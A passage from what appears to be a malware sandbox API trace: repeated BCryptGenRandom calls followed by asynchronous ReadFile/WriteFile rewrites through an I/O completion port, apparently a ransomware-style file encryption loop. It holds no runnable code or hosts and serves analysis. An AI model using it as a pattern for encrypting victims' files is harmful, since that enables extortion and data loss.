out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.404] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.405] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.406] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.406] CloseHandle (hObject=0x81c) returned 1 [0106.406] free (_Block=0x1ff1e60) [0106.406] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.413] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.413] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0106.414] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.414] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0106.414] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.414] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.414] free (_Block=0x77d800) [0106.414] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.414] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.415] free (_Block=0x1fa4848) [0106.415] free (_Block=0x2071818) [0106.415] free (_Block=0x77d908) [0106.415] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.415] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.416] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4ff0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.416] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.431] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3d75, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.432] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.432] CloseHandle (hObject=0x81c) returned 1 [0106.433] free (_Block=0x1ff1e60) [0106.433] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.440] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.440] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0106.440] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.441] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0106.441] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.441] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.441] free (_Block=0x77d800) [0106.441] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.441] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.441] free (_Block=0x1fa4848) [0106.441] free (_Block=0x2071818) [0106.441] free (_Block=0x77d908) [0106.441] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.442] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.442] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x32c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.443] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.458] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x25ee, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.459] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.469] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2244, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.470] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.479] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3896, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.480] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.490] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4780, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.503] CloseHandle (hObject=0x81c) returned 1 [0106.504] free (_Block=0x1ff1e60) [0106.505] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.513] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0106.513] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.514] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0106.514] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.514] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.514] free (_Block=0x77d800) [0106.514] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.514] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.515] free (_Block=0x1fa4848) [0106.515] free (_Block=0x2071818) [0106.515] free (_Block=0x77d908) [0106.515] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.516] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2b40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.539] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x30e8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.540] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.540] CloseHandle (hObject=0x81c) returned 1 [0106.542] free (_Block=0x1ff1e60) [0106.542] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.578] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.579] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0106.579] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.579] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0106.580] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.580] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.580] free (_Block=0x77d800) [0106.580] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.580] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.580] free (_Block=0x1fa4848) [0106.580] free (_Block=0x2071818) [0106.580] free (_Block=0x77d908) [0106.580] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.580] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.590] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.591] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0106.591] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.591] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0106.591] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.591] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.591] free (_Block=0x77d800) [0106.592] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.592] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.592] free (_Block=0x1fa4848) [0106.592] free (_Block=0x2071818) [0106.592] free (_Block=0x77d908) [0106.592] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0106.592] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.599] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.600] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0106.600] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.600] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0106.600] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.601] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.601] free (_Block=0x77d800) [0106.601] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.601] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.601] free (_Block=0x1fa4848) [0106.601] free (_Block=0x2071818) [0106.601] free (_Block=0x77d908) [0106.601] WriteFile (in: hFile=0x3ac, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0106.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.618] CloseHandle (hObject=0x81c) returned 1 [0106.620] free (_Block=0x1ff1e60) [0106.620] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.638] CloseHandle (hObject=0x3bc) returned 1 [0106.639] free (_Block=0x3e70008) [0106.639] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.666] CloseHandle (hObject=0x2f4) returned 1 [0106.668] free (_Block=0x3d70048) [0106.668] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.677] WriteFile (in: hFile=0x13c0, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x27b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0106.678] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.693] CloseHandle (hObject=0x81c) returned 1 [0106.699] free (_Block=0x1ff1e60) [0106.699] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.705] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0106.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.716] WriteFile (in: hFile=0x2f4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0106.716] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.721] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1f86, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.721] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.722] CloseHandle (hObject=0x81c) returned 1 [0108.318] free (_Block=0x1ff1e60) [0108.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.341] WriteFile (in: hFile=0x13c0, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x2460, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0108.341] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.341] CloseHandle (hObject=0x13c0) returned 1 [0108.342] free (_Block=0x3db00b8) [0108.346] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.358] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.363] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0108.363] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.363] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0108.364] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0108.364] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0108.364] free (_Block=0x77d800) [0108.364] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0108.364] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0108.364] free (_Block=0x1fa4848) [0108.364] free (_Block=0x2071818) [0108.364] free (_Block=0x77d908) [0108.364] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.365] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.365] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.365] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.376] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x386c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.427] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.445] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.445] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.446] CloseHandle (hObject=0x13c0) returned 1 [0108.447] free (_Block=0x1ff1e60) [0108.447] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0108.455] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.456] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0108.456] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.456] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 